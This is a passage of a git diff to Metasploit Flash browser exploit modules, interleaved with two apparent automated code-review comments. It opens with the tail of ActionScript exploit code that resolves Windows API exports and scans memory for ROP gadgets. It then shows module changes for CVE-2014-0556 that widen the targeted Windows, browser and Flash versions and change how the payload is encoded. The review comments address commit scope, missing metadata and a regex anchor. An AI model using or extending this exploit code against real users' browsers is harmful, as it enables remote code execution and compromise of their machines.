byte_read(eat + 0x20) - var addressOfNameOrdinals:uint = addr + byte_read(eat + 0x24) - for (var i:uint = 0; ; i++) { - var entry:uint = byte_read(addressOfNames + i * 4) - bv[6401].position = addr + entry - if (bv[6401].readUTFBytes(name.length+2).toUpperCase() == name.toUpperCase()) break - } - return addr + byte_read(addressOfFunctions + byte_read(addressOfNameOrdinals + i * 2, "word") * 4) - } - - private 
function gadget(gadget:String, hint:uint, addr:uint):uint - { - var find:uint = 0 - var limit:uint = byte_read(addr + byte_read(addr + 0x3c) + 0x50) - var value:uint = parseInt(gadget, 16) - for (var i:uint = 0; i < limit - 4; i++) if (value == (byte_read(addr + i) & hint)) break - return addr + i - } - } -} diff --git a/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb b/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb index f95e2f8dba..1182b2f2b7 100644 --- a/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb +++ b/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb @@ -6,7 +6,7 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - Rank = NormalRanking + Rank = GreatRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb b/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb index 2b401c731b..fccecf14f9 100644 --- a/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb +++ b/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb @@ -6,7 +6,7 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - Rank = NormalRanking + Rank = GreatRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/adobe_flash_copy_pixels_to_byte_array.rb b/modules/exploits/windows/browser/adobe_flash_copy_pixels_to_byte_array.rb index dfae2693d6..77e8ce5cbe 100644 --- a/modules/exploits/windows/browser/adobe_flash_copy_pixels_to_byte_array.rb +++ b/modules/exploits/windows/browser/adobe_flash_copy_pixels_to_byte_array.rb @@ -6,9 +6,8 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - Rank = NormalRanking + Rank = GreatRanking - include Msf::Exploit::Powershell include Msf::Exploit::Remote::BrowserExploitServer def initialize(info={}) 
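Review bot: The `Rank = GreatRanking` change in the adobe_flash_net_connection_confusion.rb hunk, and the identical one in adobe_flash_uncompress_zlib_uaf.rb, is not explained by the commit subject ("Update CVE-2014-0556"), which apparently concerns only the copy_pixels_to_byte_array module and its data files. The rank is the module's stated reliability claim, so a change to it should be traceable to a reason. I would either move these two one-line changes into their own commit or add a sentence to the message saying what testing supports the new rank. The class body continues outside both hunks.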
@@ -47,9 +46,12 @@ class Metasploit3 < Msf::Exploit::Remote 'BrowserRequirements' => { :source => /script|headers/i, - :os_name => OperatingSystems::Match::WINDOWS_7, - :ua_name => Msf::HttpClients::IE, - :flash => lambda { |ver| ver =~ /^14\./ && Gem::Version.new(ver) <= Gem::Version.new('14.0.0.176') }, + :os_name => lambda do |os| + os =~ OperatingSystems::Match::WINDOWS_7 || + os =~ OperatingSystems::Match::WINDOWS_81 + end, + :ua_name => lambda { |ua| [Msf::HttpClients::IE, Msf::HttpClients::FF].include?(ua) }, + :flash => lambda { |ver| ver =~ /^14\./ && Gem::Version.new(ver) <= Gem::Version.new('14.0.0.179') }, :arch => ARCH_X86 }, 'Targets' => @@ -82,17 +84,18 @@ class Metasploit3 < Msf::Exploit::Remote def exploit_template(cli, target_info) swf_random = "#{rand_text_alpha(4 + rand(3))}.swf" target_payload = get_payload(cli, target_info) - psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true}) - b64_payload = Rex::Text.encode_base64(psh_payload) + b64_payload = Rex::Text.encode_base64(target_payload) + platform_id = 'win' + os_name = target_info[:os_name] html_template = %Q| - + - +
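Review bot: The widened `'BrowserRequirements'` in the `@@ -47,9 +46,12 @@` hunk carry no comment saying where the new bounds come from: `:os_name` now also matches `WINDOWS_81`, `:ua_name` also accepts `Msf::HttpClients::FF`, and the `:flash` ceiling moves from '14.0.0.176' to '14.0.0.179'. None of the visible hunks touches the module's description, so the metadata a reader uses to judge which configurations are affected may now disagree with the checks. I would add a comment above `:flash`, for example `# upper bound: last affected 14.x build per <advisory id, placeholder>`, and bring the description's tested-on list in line with the new requirements. As a smaller point, `ver =~ /^14\./` anchors with `^`, which in Ruby matches at any line start; `\A` states the whole-string intent. The surrounding hash starts and ends outside the hunk.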